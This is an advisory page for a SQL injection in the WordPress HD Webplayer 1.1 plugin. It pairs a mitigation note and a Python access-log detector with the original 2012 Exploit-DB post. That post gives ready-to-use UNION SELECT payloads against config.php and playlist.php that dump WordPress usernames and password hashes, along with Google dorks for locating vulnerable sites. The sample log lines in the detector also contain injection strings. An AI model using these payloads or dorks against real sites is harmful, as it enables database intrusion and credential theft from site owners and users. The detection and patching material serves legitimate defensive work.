Vendor: Wordpress HD Webplayer
By: JoinSe7en
CVSS: 7.5 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: Wordpress HD Webplayer
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: YES
Related CWE: N/A
CPE: a:hdwebplayer:wordpress_hd_webplayer
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7, Backtrack 5 r3
2012

WordPress HD Webplayer 1.1 SQL Injection

The Wordpress HD Webplayer plugin version 1.1 is vulnerable to SQL Injection. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information such as usernames and passwords. The vulnerability exists in the config.php and playlist.php files, where an attacker can inject malicious SQL code into the 'id' and 'videoid' parameters respectively.

Mitigation:

Upgrade to the latest version of the Wordpress HD Webplayer plugin.
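
Until the upgrade is in place, web server access logs can be checked for requests that abuse the two parameters named above. The following detection sketch is an added example, not part of the original advisory or the plugin's code; it assumes a combined-format access log and that 'id' and 'videoid' are meant to carry a plain numeric id, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint -> parameter, as named in the advisory above.
WATCHED = {
    "/wp-content/plugins/hd-webplayer/config.php": "id",
    "/wp-content/plugins/hd-webplayer/playlist.php": "videoid",
}

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_requests(log_lines):
    """Return (client_ip, path, param, decoded_value) for every request to a
    watched endpoint whose parameter is not a plain decimal integer."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        param = WATCHED.get(url.path)
        if param is None:
            continue
        # parse_qs URL-decodes values ('+' becomes a space, %27 becomes "'").
        values = parse_qs(url.query, keep_blank_values=True).get(param, [])
        for value in values:
            # Assumption: a legitimate value is a short run of ASCII digits.
            if not re.fullmatch(r"[0-9]{1,10}", value):
                hits.append((line.split(" ", 1)[0], url.path, param, value))
    return hits

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [28/Aug/2012:10:00:01 +0000] "GET /wp-content/plugins/hd-webplayer/config.php?id=3 HTTP/1.1" 200 512',
    '203.0.113.9 - - [28/Aug/2012:10:00:07 +0000] "GET /wp-content/plugins/hd-webplayer/config.php?id=1+UNION+SELECT+1,2,3 HTTP/1.1" 200 734',
    '198.51.100.7 - - [28/Aug/2012:10:01:12 +0000] "GET /wp-content/plugins/hd-webplayer/playlist.php?videoid=7%27 HTTP/1.1" 200 98',
    '198.51.100.7 - - [28/Aug/2012:10:01:15 +0000] "GET /index.php?id=abc HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for ip, path, param, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} {path} {param}={value!r}")
```

The check only sees query strings recorded in the access log, so it does not cover parameters sent in a request body.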

Exploit-DB raw data:

   _______                     _____ _   _ _______ _____            
  |__   __|                   |_   _| \ | |__   __|  __ \     /\    
     | | ___  __ _ _ __ ___     | | |  \| |  | |  | |__) |   /  \   
     | |/ _ \/ _` | '_ ` _ \    | | | . ` |  | |  |  _  /   / /\ \  
     | |  __/ (_| | | | | | |  _| |_| |\  |  | |  | | \ \  / ____ \ 
     |_|\___|\__,_|_| |_| |_| |_____|_| \_|  |_|  |_|  \_\/_/    \_\
                                                          - JoinSe7en


+----------------------------------------------------------------------+
|               Wordpress HD Webplayer 1.1 SQL Injection               |
|                    Author: JoinSe7en [Team INTRA]                    |
+----------------------------------------------------------------------+

# Exploit Title: Wordpress HD Webplayer 1.1 SQL Injection
# Date: 28/08/2012
# Exploit Author: JoinSe7en
# Vendor Homepage: http://www.hdwebplayer.com/
# Software Link: http://hdwebplayer.com/downloads/hdwebplayer_wordpress_1.1.zip
# Category: Web Application 0-Day
# Version: version 1.1
# Tested on: Windows 7, Backtrack 5 r3

+----------------------------------------------------------------------+
|                     Vulnerability 1 - config.php                     |
+----------------------------------------------------------------------+

# Location:

http://site.com/wp-content/plugins/hd-webplayer/config.php?id= [INJECT HERE]

# Exploit Code:

config.php?id=1+/*!UNION*/+/*!SELECT*/+1,2,3,group_concat(ID,0x3a,user_login,0x3a,user_pass,0x3b),5,6,7+from+wp_users //Number of columns may be different

+----------------------------------------------------------------------+
|                    Vulnerability 2 - playlist.php                    |
+----------------------------------------------------------------------+

# Location:

http://site.com/wp-content/plugins/hd-webplayer/playlist.php?videoid= [INJECT HERE]

# Exploit Code:

playlist.php?videoid=1+/*!UNION*/+/*!SELECT*/+group_concat(ID,0x3a,user_login,0x3a,user_pass,0x3b),2,3,4,5,6,7+from+wp_users //Number of columns may be different

+----------------------------------------------------------------------+
|                             Google Dork                              |
+----------------------------------------------------------------------+

There are 3 different useful dorks to use:

# Dork 1 (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="

# Dork 2 (playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="

# Dork 3 (General):
inurl:"/wp-content/plugins/hd-webplayer/"

+----------------------------------------------------------------------+

Greetz to all members of Team INTRA <3